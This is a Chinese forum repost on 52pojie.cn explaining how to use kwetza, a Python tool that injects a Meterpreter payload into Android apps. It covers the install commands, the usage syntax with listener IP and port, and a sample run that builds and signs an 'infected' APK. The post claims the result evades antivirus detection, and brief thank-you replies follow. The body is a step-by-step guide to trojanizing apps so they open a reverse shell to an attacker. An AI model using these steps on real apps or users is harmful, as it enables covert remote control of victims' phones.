官方bilibiliWindows破解入门Android逆向入门
【网络诊断修复工具】切换到窄版

吾爱破解 - 52pojie.cn

 找回密码
 注册[Register]

QQ登录

只需一步,快速开始

吾爱破解 - 52pojie.cn»网站 【 软件安全 】 『移动安全区』 kwetza – 在Android应用中植入meterpreter payload的py ...
返回列表 发新帖
查看: 5081|回复: 3
收起左侧

[Android 转帖] kwetza – 在Android应用中植入meterpreter payload的python脚本

   关闭 [复制链接]
lucifer2046
lucifer2046 发表于 2017-7-21 11:18
本帖最后由 lucifer2046 于 2017-7-21 11:26 编辑

kwetza – 在Android应用中植入meterpreter payload的python脚本


Kwetza能够让你将Meterpreter payload植入到Android应用中。它能用默认或自定义的payload模板感染Android程序,不会被杀毒软件检测出来。




Kwetza能够让你将Meterpreter payload植入到Android应用中。它能用默认或自定义的payload模板感染Android程序,不会被杀毒软件检测出来。Kwetza可以使用原app默认的权限,也可以在app中添加权限以获得更多功能。
获取代码

git clone https://github.com/sensepost/kwetza.git

Kwetza需要BeautifulSoup才能正常运行,我们用pip进行安装:

pip install beautifulsoup4

另外我们还需要安装apktool,参考这里的安装教程:https://ibotpeaches.github.io/Apktool/install
软件使用

python kwetza.py nameOfTheApkToInfect.apkLHOST LPORT yes/no

参数说明:

    nameOfTheApkToInfect.apk = 希望植入payload的apk文件名

    LHOST = 监听IP

    LPORT = 监听端口

    yes = 选择yes则会添加额外的权限,选择no则会利用app原来的权限

运行示例

python kwetza.py hackme.apk 10.42.0.118 4444 yes
[+] MMMMMM KWETZA DECOMPILING TARGET APK
[+] ENDPOINT IP: 10.42.0.118
[+] ENDPOINT PORT: 4444
[+] APKTOOL DECOMPILED SUCCESS BYTING COMMS... ANALYZING ANDROID MANIFEST...
[+] TARGET ACTIVITY: com.foo.moo.gui.MainActivity INJECTION INTO APK
[+] CHECKING IF ADDITIONAL PERMS TO BE ADDED INJECTION OF CRAZY PERMS TO BE DONE!
[+] TIME TO BUILD INFECTED APK EXECUTING APKTOOL BUILD COMMAND
[+] BUILD RESULT
############################################
I: Using APktool 2.2.0
I: Checking whether source shas changed...
I: Smaling smali folder into classes.dex
I: Checking whether resources has changed...
I: Building resources...
I: Copying libs ...(/lib)
I: Building apk file...
I: Copying unknown files/dir...
########################################### EXECUTING JARSIGNER COMMAND...
Enter Passphrase for keystore: password
[+] JARSIGNER RESULT
###########################################
jar signed.

###########################################

[+] L00t located at hackme/dist/hackme.apk

备注

Kwetza以Python 2开发。

Kwetza默认会使用payload文件夹下的模板和keystore在apk中植入恶意payload。

如果要用自己的证书签署应用,把你的keystore重命名为mykey.keystore放在payload文件夹下。

你也可以用同样的方法替换默认的payload模板

默认keystore的密码是”password”

*参考来源:Github,本文作者:Sphinx

免费评分

参与人数 2吾爱币 +2 热心值 +2 收起 理由
smnra + 1 + 1 鼓励转贴优秀软件安全工具和文档!
新闻连泼 + 1 + 1 热心回复!

查看全部评分

本帖被以下淘专辑推荐:

发帖前要善用论坛搜索功能,那里可能会有你要找的答案或者已经有人发布过相同内容了,请勿重复发帖。
回复

举报

新闻连泼
新闻连泼 发表于 2017-7-21 11:30
新手,学习学习
【吾爱破解论坛总版规】 - [让你充分了解吾爱破解论坛行为规则]
回复 支持

举报

gy744698731
gy744698731 发表于 2017-7-21 18:35
吾爱破解论坛没有任何官方QQ群,禁止留联系方式,禁止任何商业交易。
学习了,谢谢分享
如何升级?如何获得积分?积分对应解释说明!
回复 支持

举报

B1aN
B1aN 发表于 2017-7-22 09:34
《站点帮助文档》有什么问题来这里看看吧,这里有你想知道的内容!
还有这种操作,mark一下,回头看看源码
呼吁大家发布原创作品添加吾爱破解论坛标识!
回复 支持

举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 注册[Register]

本版积分规则


免责声明:
吾爱破解所发布的一切破解补丁、注册机和注册信息及软件的解密分析文章仅限用于学习和研究目的;不得将上述内容用于商业或者非法用途,否则,一切后果请用户自负。本站信息来自网络,版权争议与本站无关。您必须在下载后的24个小时之内,从您的电脑中彻底删除上述内容。如果您喜欢该程序,请支持正版软件,购买注册,得到更好的正版服务。如有侵权请邮件与我们联系处理。

Mail To:Service@52pojie.cn

返回列表

RSS订阅|小黑屋|处罚记录|联系我们|吾爱破解 - LCG - LSG ( 京ICP备16042023号 | 京公网安备 11010502030087号 )

GMT+8, 2024-11-28 10:19

Powered by Discuz!

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表